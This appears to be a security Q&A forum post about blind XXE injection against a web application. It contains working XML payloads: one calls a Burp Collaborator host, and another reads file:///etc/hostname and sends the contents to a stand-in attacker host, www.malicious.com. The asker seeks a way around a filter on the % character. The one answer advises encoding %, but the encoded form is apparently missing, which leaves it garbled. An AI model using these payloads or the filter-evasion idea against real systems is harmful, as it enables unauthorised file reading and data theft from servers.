XXE with OOB data exfiltration

Question

SCENARIO:

I successfully tried to send a request to the burp collaborator, then the application is vulnerable to SSRF through blind XXE. The payload I used is the following

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>&xxe;</xxx>

If I use XML entities (% xxe) like this

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE % xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>%xxe;</xxx>

the payload doesn't work. So I suppose XML parameter entities or the % sign are filtered.

GOAL:

As the next step I want to exfiltrate /etc/hostname from the web application. The payload I found is the following:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/hostname" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>

....which uses XML parameter entities (%). How can I modify the payload to avoid the use of %. Is removing the % enough to have a syntactically correct payload?

score 0 · Answer 1 · answered Feb 12 '21 at 13:12

0

A lot depends on the application's XML parser. However try encoding % by using %

answered Feb 12 '21 at 13:12

James Johnson

1

XXE with OOB data exfiltration

1 Answers1